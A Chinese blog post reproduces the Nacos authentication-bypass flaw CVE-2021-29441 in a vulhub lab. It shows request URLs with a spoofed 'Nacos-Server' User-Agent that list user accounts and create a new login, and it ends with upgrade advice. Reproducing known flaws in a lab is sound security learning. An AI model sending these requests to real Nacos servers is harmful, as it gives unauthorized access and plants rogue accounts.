nacos未授权访问漏洞复现

nacos未授权访问漏洞复现

一、漏洞介绍

  Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

  该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为Nacos-Server,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

  影响版本: Nacos <= 2.0.0-ALPHA.1

  漏洞编号CVE-2021-29441

二、环境搭建

vulhuab搭建环境好后 访问http://ip:8848/nacos/#login

默认账户密码为:nacos/nacos

 三、漏洞复现

1.查看账户

访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=2并且修改user-agentNacos-Server

 

 

可以看到有nacos账户 密码为加盐后的密码

 

2.创建账户

访问http://ip:8848/nacos/v1/auth/users?username=crow&password=crow

创建一个新账户名为crow 密码为crow  

bp修改请求方式为post user-agent修改为Nacos-Server

 

成功创建新账户crow。

 

 

 

登陆crow验证一下 可以登陆

 

 

 

 四、修复建议

  升级nacos到最新版本。

 

转载:https://blog.csdn.net/csdnmmd/article/details/125905371

 

 

 

 

 

 

posted @ 2022-10-10 22:46  the苍穹  阅读(5968)  评论(0编辑  收藏  举报